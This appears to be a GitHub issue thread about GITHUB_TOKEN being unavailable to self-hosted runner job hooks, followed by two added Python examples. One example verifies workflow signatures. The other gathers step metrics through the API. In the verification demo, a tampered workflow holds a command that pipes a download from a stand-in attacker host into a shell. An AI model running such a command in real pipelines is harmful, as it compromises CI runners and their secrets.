
GITHUB_TOKEN not present in script set as ACTIONS_RUNNER_HOOK_JOB_STARTED

Open mirobertod opened this issue 2 years ago • 6 comments

Describe the bug

The env var GITHUB_TOKEN is not present in the context of the script set as ACTIONS_RUNNER_HOOK_JOB_STARTED. Not sure if this has some security concern, but we would need a valid GITHUB_TOKEN during our pre-job script.

To Reproduce

Steps to reproduce the behavior:

  1. Create a simple bash script that runs the command `env` and set its path as the env var ACTIONS_RUNNER_HOOK_JOB_STARTED
  2. Trigger the workflow
  3. See there is no GITHUB_TOKEN available.

Expected behavior

The env var GITHUB_TOKEN should be present in the context of the script set as ACTIONS_RUNNER_HOOK_JOB_STARTED.

Runner Version and Platform

Version of your runner? 2.308.0

OS of the machine running the runner? Linux Debian 11, Kubernetes (GKE) using actions-runner-controller.

Thanks

mirobertod avatar Aug 30 '23 13:08 mirobertod

We also struggle with the same problem...

AmorfEvo avatar Sep 13 '23 12:09 AmorfEvo

Hey guys, any update on this? Thanks

mirobertod avatar Dec 21 '23 16:12 mirobertod

Hello,

Any chance this change might be implemented soon?

Thanks in advance for your feedback.
Éric

EricDales avatar Mar 16 '24 08:03 EricDales

Any news about this?

MiticoBerna avatar Jul 19 '24 13:07 MiticoBerna

@mirobertod @AmorfEvo @EricDales @MiticoBerna could you help us understand more about your scenario. Especially interested in scenarios involving organization-level or enterprise-level runners.

ericsciple avatar Sep 05 '24 21:09 ericsciple

Hi @ericsciple, thank you for your interest.

We want to prevent unauthorized modifications of the CI yaml files under .github folder.

Our goal is to download the repository using the token to verify if, for example, a signature we placed at the top of the CI YAML file has been altered by someone else.

If you have a better approach to ensure that the CI configuration can be modified only from authorized people, let us know.

MiticoBerna avatar Sep 09 '24 16:09 MiticoBerna
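The check described in the comment above, as an added example that is not part of this issue thread or of the runner project: a workflow file carries a signature on its first line, and a pre-job hook recomputes it over the rest of the file and refuses to continue on a mismatch. The `# sig:` marker format, the key file path and the script name are assumptions of this example; HMAC-SHA256 from the standard library is used so the example runs offline (see the note below on why a public-key signature is the better fit for a runner).

```python
import hashlib
import hmac
import sys

# Marker placed on the first line of a signed workflow file. The format is an
# assumption of this example; any unambiguous marker works as long as signer
# and verifier agree on it.
SIG_PREFIX = "# sig: "


def split_signed(text: str):
    """Split a workflow into (signature_hex, body).

    The body is everything after the first line, so the signature covers the
    whole YAML that Actions will actually execute. Raises ValueError when the
    marker line is missing.
    """
    first, _sep, body = text.partition("\n")
    if not first.startswith(SIG_PREFIX):
        raise ValueError("no signature line at top of workflow")
    return first[len(SIG_PREFIX):].strip(), body


def body_digest(body: str, key: bytes) -> str:
    # HMAC-SHA256 keeps the example self-contained (stdlib only).
    return hmac.new(key, body.encode("utf-8"), hashlib.sha256).hexdigest()


def sign_workflow(body: str, key: bytes) -> str:
    """Produce the signed file: marker line followed by the unchanged body."""
    return f"{SIG_PREFIX}{body_digest(body, key)}\n{body}"


def verify_workflow(text: str, key: bytes) -> bool:
    """True only if the marker line is present and its MAC matches the body."""
    try:
        sig, body = split_signed(text)
    except ValueError:
        return False
    # Constant-time comparison so the check does not leak how many hex
    # characters of a forged signature were right.
    return hmac.compare_digest(sig, body_digest(body, key))


# Constructed sample workflow and key for the demo; not from any real repo.
SAMPLE_KEY = b"example-key-not-for-production"
SAMPLE_BODY = """name: ci
on: [push]
jobs:
  build:
    runs-on: self-hosted
    steps:
      - uses: actions/checkout@v4
      - run: make test
"""


def demo():
    """Sign the sample, then tamper with one step; returns (ok, tampered_ok)."""
    signed = sign_workflow(SAMPLE_BODY, SAMPLE_KEY)
    tampered = signed.replace("make test", "curl https://attacker.example | sh")
    return verify_workflow(signed, SAMPLE_KEY), verify_workflow(tampered, SAMPLE_KEY)


if __name__ == "__main__":
    # Hypothetical hook usage: verify-workflow.py <workflow.yml> <keyfile>, with
    # the key file owned by the runner host; exit non-zero on mismatch so the
    # hook script that calls this can refuse to let the job proceed.
    if len(sys.argv) != 3:
        sys.exit("usage: verify-workflow.py <workflow.yml> <keyfile>")
    with open(sys.argv[2], "rb") as kf:
        key = kf.read().strip()
    with open(sys.argv[1], encoding="utf-8") as wf:
        ok = verify_workflow(wf.read(), key)
    print("signature ok" if ok else "SIGNATURE MISMATCH")
    sys.exit(0 if ok else 1)
```

Two caveats for anyone adopting this pattern. An HMAC key that lives on the runner can also forge signatures from the runner, so a production version should use a public-key signature (for example Ed25519 via a crypto library) and keep only the verifying key on the runner host. And the content being verified has to be the workflow at the commit the job is about to run, fetched independently of the job's workspace, which is exactly why the hook needs some credential, whether GITHUB_TOKEN as requested here or a separate token provisioned to the runner.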

Hi @ericsciple, for our use-case we're looking to use the token to call the /actions/runs/{run_id}/jobs endpoint during an ACTIONS_RUNNER_HOOK_JOB_COMPLETED hook. This would let us collect metrics/traces about the job's execution (duration of individual steps, statistics about failure rates, etc). All of our runners are organization-level, so this would give us a lot of observability data.

In a roundabout way, I'm trying to retrieve this information via api due to the limitations mentioned in https://github.com/orgs/community/discussions/8945

seanlafferty-ibm avatar Oct 15 '24 19:10 seanlafferty-ibm
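The metrics collection sketched in the comment above, as an added example that is not part of this thread or of the runner project: one function issues the documented `GET /repos/{owner}/{repo}/actions/runs/{run_id}/jobs` request with a bearer token, and the rest turns the response into per-step durations and a per-job summary. The response payload below is constructed to match the shape that endpoint returns (`jobs[].steps[]` with `name`, `number`, `conclusion`, `started_at`, `completed_at`); every value in it is invented, and the token source is left to the caller because, as the issue reports, GITHUB_TOKEN is not available inside the hook.

```python
import json
import urllib.request
from datetime import datetime

API = "https://api.github.com"


def fetch_jobs(owner: str, repo: str, run_id: int, token: str) -> dict:
    """GET /repos/{owner}/{repo}/actions/runs/{run_id}/jobs with a bearer token.

    Network call; not exercised by the offline demo below.
    """
    req = urllib.request.Request(
        f"{API}/repos/{owner}/{repo}/actions/runs/{run_id}/jobs",
        headers={
            "Accept": "application/vnd.github+json",
            "Authorization": f"Bearer {token}",
            "X-GitHub-Api-Version": "2022-11-28",
        },
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def parse_ts(value):
    """Parse the API's ISO-8601 UTC timestamps; None for missing values."""
    if value is None:
        return None
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def step_metrics(payload: dict) -> list:
    """Flatten the jobs payload into one record per step.

    duration_s is None for steps that never ran (skipped steps carry no
    timestamps), so downstream aggregation must not assume a number.
    """
    records = []
    for job in payload["jobs"]:
        for step in job.get("steps", []):
            start = parse_ts(step.get("started_at"))
            end = parse_ts(step.get("completed_at"))
            records.append({
                "job": job["name"],
                "step": step["name"],
                "number": step["number"],
                "conclusion": step.get("conclusion"),
                "duration_s": (end - start).total_seconds() if start and end else None,
            })
    return records


def job_summary(payload: dict) -> dict:
    """Per job: wall-clock seconds, step count, and the first failed step."""
    summary = {}
    for job in payload["jobs"]:
        start = parse_ts(job.get("started_at"))
        end = parse_ts(job.get("completed_at"))
        failed = [s["name"] for s in job.get("steps", []) if s.get("conclusion") == "failure"]
        summary[job["name"]] = {
            "conclusion": job.get("conclusion"),
            "wall_s": (end - start).total_seconds() if start and end else None,
            "steps": len(job.get("steps", [])),
            "first_failed_step": failed[0] if failed else None,
        }
    return summary


# Constructed sample shaped like the jobs endpoint's response; all values invented.
SAMPLE = {
    "total_count": 1,
    "jobs": [{
        "id": 1, "run_id": 1, "name": "build",
        "status": "completed", "conclusion": "failure",
        "started_at": "2024-10-15T19:00:00Z", "completed_at": "2024-10-15T19:01:43Z",
        "steps": [
            {"name": "Set up job", "number": 1, "status": "completed", "conclusion": "success",
             "started_at": "2024-10-15T19:00:00Z", "completed_at": "2024-10-15T19:00:05Z"},
            {"name": "Run actions/checkout@v4", "number": 2, "status": "completed", "conclusion": "success",
             "started_at": "2024-10-15T19:00:05Z", "completed_at": "2024-10-15T19:00:12Z"},
            {"name": "Run make test", "number": 3, "status": "completed", "conclusion": "failure",
             "started_at": "2024-10-15T19:00:12Z", "completed_at": "2024-10-15T19:01:42Z"},
            {"name": "Upload coverage", "number": 4, "status": "completed", "conclusion": "skipped",
             "started_at": None, "completed_at": None},
            {"name": "Complete job", "number": 5, "status": "completed", "conclusion": "success",
             "started_at": "2024-10-15T19:01:42Z", "completed_at": "2024-10-15T19:01:43Z"},
        ],
    }],
}

if __name__ == "__main__":
    for r in step_metrics(SAMPLE):
        print(f"{r['job']}/{r['step']}: {r['conclusion']} {r['duration_s']}s")
    print(job_summary(SAMPLE))
```

Whatever token is eventually wired into the hook is exposed to every script that runs on the runner host, so it should be scoped to read-only Actions access for the repositories being observed and nothing more.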